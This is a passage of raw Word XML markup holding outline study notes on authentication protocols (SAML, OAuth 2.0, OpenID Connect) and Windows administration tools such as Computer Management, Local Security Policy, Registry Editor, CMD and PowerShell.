        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Symmetric key cryptography and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>third party</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66837656" w14:textId="1822AC8B" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Authentication on ADD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05422252" w14:textId="1BB21DED" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Username and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F54419F" w14:textId="0E936808" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SAML (Security Assertion Markup Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480AB3A0" w14:textId="22DE963C" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Single sign on – defines rules/protocols via trust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503631AB" w14:textId="4C1D5ABC" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Service providers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2EB43E" w14:textId="7DCF5A74" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Identity providers – performs auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAED2D3" w14:textId="16CE12C6" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OAUTH 2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB2E881" w14:textId="69A2C208" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Standard that apps se to provide client applications with access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FA99B4" w14:textId="0503EC2C" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Four important roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02880C1C" w14:textId="5FB6727B" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Authorization server – issues access token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552B19F" w14:textId="2C4BDD5D" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Resource owner – end-user, grants permission to access resource server with access token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75780463" w14:textId="3B23B7B7" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client – application that requests access token, passed to resource server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D84A2BF" w14:textId="5C0FEF8D" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Resource server – accepts access token and verify validity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCDE770" w14:textId="6A65CA50" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OpenID Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0F53F3" w14:textId="777BEEF2" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Built on top of OAuth 2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AA4FC" w14:textId="76B1018B" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Additional ID token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F953332" w14:textId="289FE572" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using JSON Web Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19320FB3" w14:textId="6A44C38F" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OIDC is all about user authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F271A" w14:textId="4C37230E" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Utility Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48BC34" w14:textId="1755999D" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Computer Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F2CE29" w14:textId="2F5B74FB" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Local Security Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5EC39F" w14:textId="178F8574" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Disk Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FF6C15" w14:textId="7230DCFB" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Registry Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A7574" w14:textId="45C48092" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Command-line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E85376F" w14:textId="3E4C10B4" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Registry Editor (regedit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0729A7E1" w14:textId="6A8336B0" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Computer Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D5F466" w14:textId="272C5139" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Task schedule – allows predefined actions to be automatically executed under preset conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9033A2" w14:textId="71A4D92F" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Event viewer – logs events that happen across the device – can be used to forward events to SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5BD578" w14:textId="5603F360" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Shared folders – shared across network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1FF638" w14:textId="28B4AC06" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Local users and computers – create users, add to built-in groups, given different access levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10756ED5" w14:textId="064EAA6E" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Performance monitor – monitor different activities across device such as CPU usage, memory usage, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633877F" w14:textId="5E43DC8A" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Disk management – shrink, expand, create new partitions, format partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C12FA" w14:textId="781345B9" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Services and applications – check running services on system and ability to start, stop, restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1666CFA8" w14:textId="713F58B9" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Local Security Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D7AAD" w14:textId="7E02EC49" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Configure to strengthen computer security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512FABAC" w14:textId="7607BE8B" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Minimum password length and complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2225DB86" w14:textId="6AA50E0B" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Disable guest and local admin accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5918A891" w14:textId="139A48C7" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Do not disable if AD is not integrated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E6BCAF" w14:textId="5337D978" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Disk Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209EAA6F" w14:textId="788CD4D2" w:rsidR="00724BFE" w:rsidRPr="0084205E" w:rsidRDefault="00724BFE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Delete useless files</w:t>
      </w:r>
      <w:r w:rsidR="002A5E83" w:rsidRPr="0084205E">
        <w:t>, clean system files under admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCD6856" w14:textId="1326A8BA" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Registry Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D23B4E5" w14:textId="4B81FCB6" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Stores important OS settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C8BA1E" w14:textId="65158AE3" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Command-line Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E0388" w14:textId="5EC63B3A" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">CMD – command-line interpreter, use to automate various system-related tasks using scripts and batch files – interact with OS directly – limited admin abilities compared to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="146CC232" w14:textId="16F937EC" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – used by sysadmins to manage the network and domain they handle – scripting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>langiage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – can interpret batch commands and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9DF3DE" w14:textId="3BAEEEEF" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
